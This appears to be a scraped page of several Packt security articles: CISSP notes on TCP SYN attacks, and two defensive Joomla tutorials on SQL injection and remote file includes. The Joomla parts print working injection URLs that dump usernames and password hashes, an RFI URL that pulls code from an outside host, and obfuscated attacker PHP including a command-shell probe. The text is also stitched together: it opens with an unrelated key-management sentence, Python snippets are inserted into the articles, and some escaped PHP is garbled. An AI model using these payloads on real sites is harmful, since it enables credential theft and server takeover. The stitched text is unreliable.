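Encoding the table this way makes it easy for a key management service to reject nonsensical lifecycle moves, such as reactivating a destroyed key.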
Packt
28 Oct 2009
5 min read
Telecommunications and Network Security Concepts for CISSP Exam

Transport layer

The transport layer in the TCP/IP model does two things: it packages the data given out by applications into a format that is suitable for transport over the network, and it unpacks the data received from the network into a format suitable for applications.

The process of packaging the data packets received from the applications is known as encapsulation, and the output of such a process is known as a datagram. Similarly, the process of unpacking the datagram received from the network is known as de-encapsulation. A transport section in a protocol stack carries information in the form of datagrams, frames, and bits.

Transport layer protocols

There are many transport layer protocols that carry out the transport layer functions. The most important ones are:

- Transmission Control Protocol (TCP): a core Internet protocol that provides reliable delivery mechanisms over the Internet. TCP is a connection-oriented protocol.
- User Datagram Protocol (UDP): similar to TCP, but connectionless.

A connection-oriented protocol is a protocol that guarantees delivery of datagrams (packets) to the destination application by way of a suitable mechanism; for example, the three-way handshake (SYN, SYN-ACK, ACK) in TCP. The reliability of datagram delivery with such a protocol is high.

A protocol that does not guarantee the delivery of datagrams, or packets, to the destination is known as a connectionless protocol. These protocols use only one-way communication. The speed of datagram delivery by such protocols is high.

Other transport layer protocols are as follows:

- Sequenced Packet eXchange (SPX): part of the IPX/SPX protocol suite used in the Novell NetWare operating system. While Internetwork Packet eXchange (IPX) is a network layer protocol, SPX is a transport layer protocol.
- Stream Control Transmission Protocol (SCTP): a connection-oriented protocol similar to TCP, but one that provides facilities such as multi-streaming and multi-homing for better performance and redundancy. It is used in Unix-like operating systems.
- AppleTalk Transaction Protocol (ATP): a proprietary protocol developed for Apple Macintosh computers.
- Datagram Congestion Control Protocol (DCCP): as the name implies, a transport layer protocol used for congestion control. Applications include Internet telephony and video or audio streaming over the network.
- Fibre Channel Protocol (FCP): used in high-speed networking such as Gigabit networking. One of its prominent applications is the Storage Area Network (SAN). A SAN is a network architecture used for attaching remote storage devices, such as tape drives and disk arrays, to a local server. This facilitates the use of storage devices as if they were local devices.

In the following sections we'll review the most important protocols: TCP and UDP.

Transmission Control Protocol (TCP)

TCP is a connection-oriented protocol that is widely used in Internet communications. As the name implies, the protocol has two functions: the primary function of TCP is the transmission of datagrams between applications, while the secondary function relates to the controls that are necessary for ensuring reliable transmissions.

Protocol/Service: Transmission Control Protocol (TCP)
Layer(s): TCP works in the transport layer of the TCP/IP model
Applications: applications where delivery needs to be assured, such as email, the World Wide Web (WWW), and file transfer, use TCP for transmission
Threats: service disruption
Vulnerabilities: half-open connections
Attacks: denial-of-service attacks such as TCP SYN attacks; connection hijacking such as IP spoofing attacks
Countermeasures: SYN cookies; cryptographic solutions

A half-open connection is a vulnerability in TCP implementations.
TCP uses a three-way handshake to establish or terminate connections, as shown in the following illustration.

In a three-way handshake, the client (workstation) first sends a request to the server (www.some_website.com). This is known as a SYN request. The server acknowledges the request by sending a SYN-ACK and, in the process, creates a buffer for that connection. The client does a final acknowledgement by sending an ACK. TCP requires this setup because the protocol needs to ensure the reliability of packet delivery.

If the client does not send the final ACK, the connection is known as half-open. Since the server has created a buffer for that connection, a certain amount of memory or server resources is consumed. If thousands of such half-open connections are created maliciously, the server's resources may be completely consumed, resulting in a denial of service to legitimate requests.

TCP SYN attacks work by establishing thousands of half-open connections to consume the server's resources. Two actions can be taken by an attacker:

- The attacker, or malicious software, sends thousands of SYNs to the server and withholds the ACKs. This is known as SYN flooding. Depending on the capacity of the network bandwidth and the server resources, the entire pool of resources will be consumed over time, resulting in a denial of service.
- If the source IP were blocked by some means, then the attacker, or the malicious software, would try to spoof the source IP addresses to continue the attack. This is known as SYN spoofing.

SYN attacks such as SYN flooding and SYN spoofing can be controlled using SYN cookies with cryptographic hash functions. In this method, the server does not create the connection at the SYN-ACK stage. Instead, it creates a cookie from the computed hash of the source IP address, source port, destination IP, destination port, and some random values based on an algorithm, and sends it as the SYN-ACK.
When the server receives an ACK, it checks the details and only then creates the connection.

A cookie is a piece of information, usually in the form of a text file, sent by a server to a client. Cookies are generally stored on the client's computer and are used for purposes such as authentication, session tracking, and management.

User Datagram Protocol (UDP)

UDP is a connectionless protocol similar to TCP. However, UDP does not provide a delivery guarantee for data packets.
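The SYN cookie idea described above can be sketched as follows. The hash inputs mirror the list given in the text (source/destination IP and port plus a changing value); the exact construction real TCP stacks use differs, and the secret and addresses here are invented.

```python
import hashlib
import hmac
import time

SECRET = b"server-secret"  # hypothetical per-server secret value

def syn_cookie(src_ip, src_port, dst_ip, dst_port, counter):
    """Derive a SYN cookie from the connection 4-tuple plus a
    slowly-changing counter -- a simplified sketch of the idea,
    not the construction used by the Linux kernel."""
    msg = f"{src_ip}:{src_port}->{dst_ip}:{dst_port}|{counter}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:8]

# The server computes the cookie at SYN time, sends it in the SYN-ACK,
# and recomputes it when the ACK arrives. A match proves the ACK belongs
# to a real earlier SYN, so no buffer is held for half-open connections.
counter = int(time.time()) // 64
sent = syn_cookie("10.0.0.5", 40000, "10.0.0.1", 80, counter)
echoed = syn_cookie("10.0.0.5", 40000, "10.0.0.1", 80, counter)
assert echoed == sent
```

Because the cookie is recomputable from the packet headers alone, a SYN flood costs the attacker bandwidth but costs the server no per-connection memory.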
Packt
23 Oct 2009
6 min read
Preventing SQL Injection Attacks on your Joomla Websites

Introduction

Mark Twain once said, "There are only two certainties in life: death and taxes." Even in web security there are two certainties: it's not if you are attacked, but when and how your site will be taken advantage of. There are several types of attacks that your Joomla! site may be vulnerable to, such as CSRF, buffer overflows, blind SQL injection, denial of service, and others that are yet to be found.

The top issues in PHP-based websites are:

- Incorrect or invalid (intentional or unintentional) input
- Access control vulnerabilities
- Session hijacks and attempts on session IDs
- SQL Injection and Blind SQL Injection
- Incorrect or ignored PHP configuration settings
- Divulging too much in error messages and poor error handling
- Cross Site Scripting (XSS)
- Cross Site Request Forgery, that is, CSRF (one-click attack)

SQL Injections

SQL databases are the heart of the Joomla! CMS. The database holds the content, the user IDs, the settings, and more. Gaining access to this valuable resource is the ultimate prize for a hacker. Accessing it can provide administrative access, which can yield private information such as usernames and passwords, and can allow any number of bad things to happen.

When you request a page from Joomla!, it forms a "query", or a question, for the database. The database does not suspect that you may be asking a malformed question and will attempt to process whatever the query is. Often, developers do not construct their code to watch for this type of attack. In fact, in the month of February 2008 alone, twenty-one new SQL Injection vulnerabilities were discovered in Joomla!-land. The following are some examples, presented for your edification.
Using any of these for any purpose is solely your responsibility and not mine:

Example 1

index.php?option=com_****&Itemid=name&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*

Example 2

index.php?option=com_****&task=****&Itemid=name&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*

Both of these will reveal, under the right set of circumstances, the usernames and passwords in your system. There is a measure of protection in Joomla! 1.0.13, with an encryption scheme that will render the passwords useless. However, it does not make sense to allow vulnerable extensions to remain installed. Yielding ANY kind of information like this is unacceptable.

The following screenshot displays the results of the second example running on a test system with the vulnerable extension. The two pieces of information are the username, listed as Author, and the hex string (partially blurred) that is the hashed password.

You can see that not all MD5 hashes can be broken easily. Though it won't be shown here, there is a website available where you enter your hash and it attempts to crack it. It supports several popular hashes. When I entered this hash (of a password) into the tool, I found the password to be Anthony. It's worth noting that this hash and its password are the result of a website getting broken into, prompting the user to search for the "hash" left behind, thus yielding the password.

The important news, however, is that if you are using Joomla! 1.0.13 or greater, the password's hash is now calculated with a "salt", making it nearly impossible to break. However, a standard MD5 hash could still be broken with enough effort in many cases. For more information about salting and MD5, see: http://www.php.net/md5.
For an interesting read on salting, you may wish to read this link: www.governmentsecurity.org/forum/lofiversion/index.php/t19179.htm

SQL Injection is a query put to an SQL database where data input was expected AND the application does not correctly filter the input. It allows hijacking of database information such as usernames and passwords, as we saw in the earlier example. Most of these attacks are based on two things. First, the developers have coding errors in their code, or they potentially reused code from another application, thus spreading the error. The other issue is inadequate validation of input. In essence, it means trusting users to put in the RIGHT stuff, and not to put in queries meant to harm the system. User input is rarely to be trusted for this reason. It should always be checked for proper format, length, and range.

There are many ways to test for vulnerability to SQL Injection, but one of the most common is to enter a string such as ' or 1=1-- into an input field. In some cases, this may be enough to trigger a database to divulge details. This very simplistic example would not work in the login box that is shown. However, if it were presented to a vulnerable extension in a manner such as the following, it might work:

<FORM action=http://www.vulnerablesite.com/Search.php method=post>
<input type=hidden name=A value="me' or 1=1--">
</FORM>

This "posting" method (presented as a very generic exploit and not meant to work per se in Joomla!) will attempt to break into the database by putting forward queries that would not necessarily be noticed. But why 1=1--? According to PHP.NET, "It is a common technique to force the SQL parser to ignore the rest of the query written by the developer with -- which is the comment sign in SQL."

You might be thinking, "So what if my passwords are hashed? They can get them but they cannot break them!"
This is true, but if they wanted it badly, nothing keeps them from doing something such as this:

INSERT INTO jos_mydb_users ('email','password','login_id','full_name')
VALUES ('johndoe@email.com','default','Jdoe','John Doe');--';

This code has potential if inserted into a query such as this:

http://www.yourdomain/vulnerable_extension//index.php?option=com_vulext INSERT INTO jos_mydb_users ('email','password','login_id','full_name') VALUES ('johndoe@email.com','default','Jdoe','John Doe');--';

Again, this is a completely bogus example and is not likely to work. But if you can get an SQL DB to divulge its information, you can get it to "accept" (insert) information it should not as well.
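The me' or 1=1-- trick above can be demonstrated end to end, along with the defense. The sketch below uses Python's bundled sqlite3 module rather than Joomla!'s PHP/MySQL stack, and the table and values are made up; the lesson is the same in any language: bind user input as a parameter instead of concatenating it into the SQL string.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE jos_users (username TEXT, password TEXT)")
conn.execute("INSERT INTO jos_users VALUES ('admin', 'hash123')")

evil = "me' OR 1=1--"

# Unsafe: string concatenation lets the input rewrite the query.
# The -- comments out the closing quote, and OR 1=1 matches every row.
unsafe_sql = "SELECT * FROM jos_users WHERE username = '" + evil + "'"
leaked = conn.execute(unsafe_sql).fetchall()
assert len(leaked) == 1  # the admin row is exposed

# Safe: a bound parameter is treated purely as data, never as SQL.
safe = conn.execute(
    "SELECT * FROM jos_users WHERE username = ?", (evil,)).fetchall()
assert safe == []  # no user is literally named "me' OR 1=1--"
```

Parameterized queries (prepared statements in PHP's mysqli or PDO) are the standard countermeasure, precisely because they remove the parser's ability to reinterpret user input as query syntax.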

Packt
15 Oct 2009
7 min read

Preventing Remote File Includes Attack on your Joomla Websites

PHP is an open-source server-side scripting language. It is the basis of many web applications, and it works very nicely with database-driven platforms such as Joomla!. Since Joomla! is growing and its popularity is increasing, malicious hackers are looking for holes. The development community has the prime responsibility to produce the most secure extensions possible. In my opinion, this comes before usability, accessibility, and so on. After all, if a beautiful extension has some glaring holes, it won't be usable. The administrators and site development folks have the next layer of responsibility: to ensure that they have done everything they can to prevent attacks by checking crucial settings, patching, and monitoring logs. If these two layers are combined and executed properly, they will result in secure web transactions.

SQL Injections, though very nasty, can be prevented in many cases; but an RFI attack is more difficult to stop altogether. So, it is important that you are aware of them and know their signs.

Remote File Includes

An RFI vulnerability exists when an attacker can insert a script or code into a URL and command your server to execute the evil code. It is important to note that File Inclusion attacks such as these can mostly be mitigated by turning Register_Globals off. Turning this off ensures that a request variable such as $page is not treated as a super-global variable, and thus does not allow an inclusion. The following is a sanitized attempt to attack a server in just such a manner:

http://www.exampledomain.com/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i?
If the site in this example did not have appropriate safeguards in place, the following code would be executed:

$x0b="inx72_147x65x74";
$x0c="184rx74o154x6fwex72";
echo "c162141156kx5fr157cx6bs";
if (@$x0b("222x61x33e_x6d144e") or $x0c(@$x0b("x73ax66x65_mx6fde")) == "x6fx6e"){
    echo "345a146x65155od145x3ao156";
} else {
    echo "345a146ex6dox64e:x6ffx66";
}
exit();
?>

This code is from a group that calls itself "Crank". The purpose of this code is not known, and therefore we do not want it to be executed on our site. This attempt to insert the code appears to want my browser to execute something and report one thing or another:

{echo "345a146x65155od145x3ao156";}else{echo "345a146ex6dox64e:x6ffx66";}exit();

Here is another example of an attempted script. This one is in PHP, and would attempt to execute in the same fashion by making an insertion on the URL:

<html><head><title>/// Response CMD ///</title></head>
<body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
    echo("Safe Mode of this Server is : ");
    echo("SafemodeOFF");
} else {
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
        echo("Safe Mode of this Server is : ");
        echo("SafemodeOFF");
    } else {
        echo("Safe Mode of this Server is : ");
        echo("SafemodeON");
    }
}
...
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
}
}
return $res;
}
exit;

This sanitized example wants to learn whether we are running SAFE MODE on or off, and would then attempt to start a command shell on our server. If the attackers are successful, they will gain access to the machine and take over from there. For Windows users, a command shell is the equivalent of running START | RUN | CMD, thus opening what we would call a "DOS prompt".
Other methods of attack include the following:

- Evil code uploaded through session files, or through image uploads.
- The insertion or placement of code that you might think would be safe, such as compressed audio streams. These do not get inspected as they should be, and could allow access to remote resources. It is noteworthy that this can slip past even if you have set allow_url_fopen or allow_url_include to disabled.
- Taking input from the request POST data rather than from a data file.

There are several other methods beyond this list, and judging from the traffic at my sites, the list and methods change on an "irregular" basis. This highlights our need for a robust security architecture, and for being very careful in accepting user input on our websites.

The Most Basic Attempt

You don't always need heavy or fancy code as in the earlier examples. Just appending a page request of sorts to the end of the URL will do it. Remember this?

/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i?

Here we're instructing the server to change the path in our environment to match the code located out there. Here is such a "shell":

<?php
$file = $_GET['evil-page'];
include($file . ".php");
?>

What Can We Do to Stop This?

As stated repeatedly, defense in depth is the most important of design considerations. Putting up many layers of defense will enable you to withstand attacks. This type of attack can be defended against at the .htaccess level and by filtering the inputs. One problem is that we tend to forget that many defaults in PHP set up a condition for failure. Take this for instance: allow_url_fopen is on by default.

"Default? Why do you care?" you may ask.
This, if enabled, allows PHP file functions such as file_get_contents(), and the ever-present include and require statements, to work in a manner you may not have anticipated, such as retrieving the entire contents of your website, or allowing a determined attacker to break in. Programmers sometimes forget to do proper input filtering in their user fields, for example an input box that allows any type of data to be entered, or allows code to be inserted for an injection attack. Lots of site break-ins, defacements, and worse are the result of a combination of poor programming on the coder's part and not disabling the allow_url_fopen option. This leads to code injections, as in our previous examples.

Make sure you keep Register Globals OFF. This is a biggie that will prevent much evil! There are a few ways to do this, and they are handled differently depending on your version of Joomla!. In Joomla! versions earlier than 1.0.13, look for this code in globals.php:

// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );
/*
 * Use 1 to emulate register_globals = on
 * WARNING: SETTING TO 1 MAY BE REQUIRED FOR BACKWARD COMPATIBILITY
 * OF SOME THIRD-PARTY COMPONENTS BUT IS NOT RECOMMENDED
 *
 * Use 0 to emulate register_globals = off
 * NOTE: THIS IS THE RECOMMENDED SETTING FOR YOUR SITE BUT YOU MAY
 * EXPERIENCE PROBLEMS WITH SOME THIRD-PARTY COMPONENTS
 */
define( 'RG_EMULATION', 0 );

Make sure RG_EMULATION is set to ZERO (0) instead of one (1). Out of the box it is 1, meaning register_globals is emulated as on. In Joomla! 1.0.13 and greater (in the 1.x series), look for this field in the GLOBAL CONFIGURATION | SERVER tab:

Have you upgraded from an earlier version of Joomla!?
Affects: Joomla! 1.0.13—1.0.14
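The other half of the defense named above, filtering the inputs, is most robust as an allow-list: map the requested page name onto a fixed set of known files and refuse everything else, so a payload like the mosConfig_absolute_path URL never reaches an include at all. Here is a hedged sketch of the pattern in Python (the page names are invented for illustration; in a PHP extension, the same lookup would guard the include statement):

```python
# Only these page names may ever be included; everything else is refused.
ALLOWED_PAGES = {
    "home": "home.php",
    "contact": "contact.php",
}

def resolve_page(requested):
    """Map a request parameter to a known file, or reject it outright."""
    if requested not in ALLOWED_PAGES:
        raise ValueError("unknown page requested: %r" % requested)
    return ALLOWED_PAGES[requested]

safe = resolve_page("home")  # "home.php"

# A remote-include attempt fails before any file or URL is touched.
try:
    resolve_page("http://www.forum.com/update/xxxxx/sys_yyyyy/i")
    rejected = False
except ValueError:
    rejected = True
```

Because the lookup only ever returns values the developer wrote, no attacker-supplied path, local or remote, can be executed, regardless of the allow_url_fopen setting.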